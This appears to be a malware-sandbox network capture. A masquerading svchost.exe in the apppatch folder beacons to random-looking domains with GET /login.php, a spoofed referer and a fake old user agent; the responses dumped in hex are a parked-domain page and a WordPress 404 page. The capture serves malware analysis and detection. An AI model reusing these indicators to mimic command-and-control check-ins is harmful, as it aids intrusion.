                                                                                                                                                                                                              Data Ascii: charset="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{heig


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              5192.168.2.85011275.2.71.1994437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:35 GMT
                                                                                                                                                                                                              Etag: "lswwo6qdvu19wv"
                                                                                                                                                                                                              Server: Caddy
                                                                                                                                                                                                              Server: awselb/2.0
                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                              X-Powered-By: Next.js
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                              Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                              Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                              Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                              Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                              Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                              Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                              Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                              Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                              Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              6192.168.2.850111188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:33:35 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC951INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:36 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e1p%2B3ek1m0cURCHenj1AiLsqvqVr%2Fh9sYjBQZbwcDOBqNdCTjR4bM1A0rYn%2B0OflXLyqGbNEBploXXZgeuX3zmF3k6AH%2FFyuMFRDMMnMHomnEhaiX%2FRUXpstnuAfuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e100739b8c80cac-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2061209&cwnd=249&unsent_bytes=0&cid=90ed1645990d313e&ts=995&x=0"
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC418INData Raw: 37 63 61 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7ca5<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72
                                                                                                                                                                                                              Data Ascii: style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta pr
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61
                                                                                                                                                                                                              Data Ascii: tion c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canva
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e
                                                                                                                                                                                                              Data Ascii: ed"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64
                                                                                                                                                                                                              Data Ascii: concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74
                                                                                                                                                                                                              Data Ascii: te-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font
                                                                                                                                                                                                              2024-11-11 17:33:36 UTC1369INData Raw: 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65
                                                                                                                                                                                                              Data Ascii: :-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-ne
